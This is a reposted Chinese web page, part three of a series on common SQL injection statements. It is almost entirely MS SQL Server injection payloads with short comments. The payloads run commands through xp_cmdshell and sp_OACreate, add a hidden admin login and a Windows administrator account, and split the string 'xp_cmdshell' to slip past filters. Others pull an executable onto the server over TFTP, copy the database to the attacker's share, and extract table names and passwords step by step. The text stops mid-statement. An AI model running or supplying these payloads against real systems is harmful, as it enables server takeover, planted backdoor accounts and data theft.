常用SQL注射语句解析(3)

来源:转载

    aths(path)

values(@test)--

;use ku1;--

;create table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程:

;exec master..xp_cmdshell 'dir'

;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

;exec master.dbo.sp_password null,jiaoniang$,1866574;--

;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*

/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$

/add';--

exec master..xp_servicecontrol 'start', 'schedule' 启动服务

exec master..xp_servicecontrol 'start', 'server'

; DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

jiaoniang$ 1866574 /add'

;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net

localgroup administrators jiaoniang$ /add'

'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件

;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/'

;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:/'

;declare @a;set @a=db_name();backup database @a to

disk='你的IP你的共享目录bak.dat'

如果被限制则可以。

select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec

master.dbo.sp_addlogin hax')

查询构造:

Select * FROM news Where id=... AND topic=... AND .....

admin'and 1=(select count(*) from [user] where username='victim' and

right(left(userpass,01),1)='1') and userpass <>'

select 123;--

;use master;--

:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。

and 1<>(select count(email) from [user]);--

;update [users] set email=(select top 1 name from sysobjects where

xtype='u' and status>0) where name='ffff';--

;update [users] set email=(select top 1 id from sysobjects where xtype='u'

and name='ad') where name='ffff';--

';update [users] set email=(select top 1 name from sysobjects where

xtype='u' and id>581577110) where name='ffff';--

';update [users] set email=(select top 1 count(id) from password) where

name='ffff';--

';update [users] set email=(select top 1 pwd from password where id=2)

where name='ffff';--

';update [users] set email=(select top 1 name from password where id=2)

where name='ffff';--

上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

通过查看ffff的用户资料可得第一个用户表叫ad

然后根据表名ad得到这个表的ID,再得到第二个表的名字。

insert into users values( 666,

char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

char(0x63)+char(0x68)+char(0x72)+c

 
